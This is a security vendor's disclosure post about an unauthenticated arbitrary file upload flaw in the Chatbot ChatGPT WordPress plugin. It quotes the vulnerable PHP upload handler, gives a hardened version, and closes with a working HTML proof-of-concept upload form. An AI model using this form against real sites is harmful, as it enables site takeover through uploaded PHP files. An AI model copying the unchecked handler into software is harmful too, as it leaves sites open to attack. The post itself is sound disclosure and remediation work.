Did ChatGPT Write This Extremely Vulnerable Code Added to the Chatbot ChatGPT for WordPress Plugin?
A lot has been made of the possible security risk of code created by ChatGPT, whether in WordPress plugins or elsewhere. A more pedestrian risk is that WordPress plugins that interact with ChatGPT are themselves insecure, whether their code was written by ChatGPT or not. Yet again, we have found one of those plugins adding vulnerable code that hackers would exploit.
One way we help to improve the security of WordPress plugins, not just for the customers of our service, but for everyone using them, is our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through that, we caught such a vulnerability being added to Chatbot ChatGPT. The vulnerability is an arbitrary file upload vulnerability, which, as the name suggests, allows an attacker to upload arbitrary files to the website. Because the upload handler requires no authentication and writes into a directory under the web root, an attacker could upload a .php file containing malicious code, request it directly, and take over the website.
We now are also running all the code in the plugins used by our customers through that monitoring system on a weekly basis to provide additional protection for them.
The possibility of this vulnerability is also flagged by our Plugin Security Checker, so you can check plugins you use to see if they might have similar issues with that tool.
We tested and confirmed that our firewall plugin for WordPress protected against the vulnerability, even before we discovered the vulnerability, as part of its protection against zero-day vulnerabilities.
Arbitrary File Upload
In version 1.7.6 of the plugin, a new function, chatbot_chatgpt_upload_file_to_assistant(), was added and made accessible through WordPress AJAX functionality to those logged in to WordPress, as well as those not logged in:
```php
add_action('wp_ajax_chatbot_chatgpt_upload_file_to_assistant', 'chatbot_chatgpt_upload_file_to_assistant');
add_action('wp_ajax_nopriv_chatbot_chatgpt_upload_file_to_assistant', 'chatbot_chatgpt_upload_file_to_assistant');
```
The function, which is in the file /includes/chatbot-chatgpt-file-upload.php, doesn't contain any checks to limit what types of files can be uploaded (nor any nonce or capability check) before saving an uploaded file, under the filename supplied by the client, to the directory /wp-content/plugins/chatbot-chatgpt/uploads/:
```php
function chatbot_chatgpt_upload_file_to_assistant() {

    // DIAG - Diagnostic - Ver 1.7.6
    // chatbot_chatgpt_back_trace( 'NOTICE', "Entering chatbot_chatgpt_upload_file_to_assistant()" );

    $upload_dir = WP_CONTENT_DIR . '/plugins/chatbot-chatgpt/uploads/';
    $file_path = $upload_dir . basename($_FILES['file']['name']);

    // DIAG - Diagnostic - Ver 1.7.6
    // chatbot_chatgpt_back_trace( 'NOTICE', $upload_dir );
    // chatbot_chatgpt_back_trace( 'NOTICE', $file_path );

    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0777, true); // Create directory if it doesn't exist
    }

    // Check if there was an error during the file upload
    if ($_FILES['file']['error'] > 0) {
        // chatbot_chatgpt_back_trace('ERROR', "Error during file upload: " . $_FILES['file']['error']);
    } else {
        if (move_uploaded_file($_FILES['file']['tmp_name'], $file_path)) {
            // ... remainder of the function not shown in this post ...
        }
    }
}
```
The amount of commented text there is unusual. Is that something generated by an automated coding tool or just the developer’s own unique commenting style?
The rest of the function never removes the uploaded file, so whatever was uploaded stays on the server at a path the attacker already knows.
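For comparison, here is what the same handler looks like with the missing checks in place. This is an added example, not code from the plugin or its developer. It keeps the plugin's AJAX action name; the hardened function name, the nonce action name chatbot_chatgpt_upload, the allow-list of document types and the 5 MiB size cap are assumptions made for the example:

```php
<?php
// Hardened replacement for chatbot_chatgpt_upload_file_to_assistant().
// Added example, not the plugin's own code. The nonce action name,
// the allow-list and the size cap below are assumptions.

require_once ABSPATH . 'wp-admin/includes/file.php'; // wp_handle_upload()

// Only logged-in users reach the handler: no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_chatbot_chatgpt_upload_file_to_assistant', 'chatbot_chatgpt_upload_file_to_assistant_hardened' );

function chatbot_chatgpt_upload_file_to_assistant_hardened() {
    // 1. CSRF: the request must carry a nonce created with
    //    wp_create_nonce( 'chatbot_chatgpt_upload' ) (assumed nonce action);
    //    check_ajax_referer() dies with a 403 if it is missing or invalid.
    check_ajax_referer( 'chatbot_chatgpt_upload', 'nonce' );

    // 2. Authorization: being logged in is not enough; a subscriber account
    //    must not be able to push files onto the server.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input presence and PHP-level upload status.
    if ( empty( $_FILES['file'] ) || ! is_array( $_FILES['file'] ) ) {
        wp_send_json_error( array( 'message' => 'No file supplied.' ), 400 );
    }
    $file = $_FILES['file'];
    if ( (int) $file['error'] !== UPLOAD_ERR_OK ) {
        wp_send_json_error( array( 'message' => 'Upload failed.', 'code' => (int) $file['error'] ), 400 );
    }

    // 4. Size cap (assumed limit of 5 MiB) before any content inspection.
    if ( (int) $file['size'] > 5 * 1024 * 1024 ) {
        wp_send_json_error( array( 'message' => 'File too large.' ), 413 );
    }

    // 5. Type allow-list (assumed: document types an assistant would ingest).
    //    Keys are extension patterns, values MIME types, the format
    //    wp_check_filetype_and_ext() and wp_handle_upload() expect.
    $allowed_mimes = array(
        'txt'  => 'text/plain',
        'pdf'  => 'application/pdf',
        'csv'  => 'text/csv',
        'json' => 'application/json',
    );
    $filename = sanitize_file_name( $file['name'] );
    $check    = wp_check_filetype_and_ext( $file['tmp_name'], $filename, $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        // Rejects .php/.phtml, names like shell.php.txt whose content does not
        // match the claimed type, and anything outside the allow-list.
        wp_send_json_error( array( 'message' => 'File type not allowed.' ), 415 );
    }
    if ( ! empty( $check['proper_filename'] ) ) {
        $filename = $check['proper_filename']; // WordPress corrected the extension
    }

    // 6. Let WordPress store the file under wp-content/uploads with a unique,
    //    sanitized name instead of a world-writable folder inside the plugin.
    //    wp_handle_upload() re-validates the type against $allowed_mimes.
    $file['name'] = $filename;
    $result = wp_handle_upload( $file, array(
        'test_form' => false,
        'mimes'     => $allowed_mimes,
    ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 500 );
    }

    // ... hand $result['file'] to the assistant API here ...

    // 7. Do not leave the upload on disk once it has been forwarded.
    wp_delete_file( $result['file'] );

    wp_send_json_success( array( 'message' => 'File processed.' ) );
}
```

The front-end JavaScript has to send the nonce as the `nonce` field of the multipart request (typically exposed to the script with wp_localize_script()). With these checks in place, the proof of concept form further down in this post returns a 403 from check_ajax_referer() for an unauthenticated request and a JSON error for a logged-in user lacking the upload_files capability or submitting a .php file, rather than a file landing in a web-accessible directory. If a plugin genuinely needs its own upload folder, it should be created with restrictive permissions rather than 0777 and protected from direct execution, and files should be deleted as soon as they have been forwarded.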
WordPress Causes Full Disclosure
As a protest of the continued inappropriate behavior of the moderators of the WordPress Support Forum, we changed from reasonably disclosing to fully disclosing vulnerabilities in plugins in the WordPress Plugin Directory until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about it for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)
You can notify the developer of this issue on the forum as well.
After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.
Is It Fixed?
If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.
Proof of Concept
The following proof of concept will upload the file sent with the request to the directory /wp-content/plugins/chatbot-chatgpt/uploads/.
Replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=chatbot_chatgpt_upload_file_to_assistant" enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```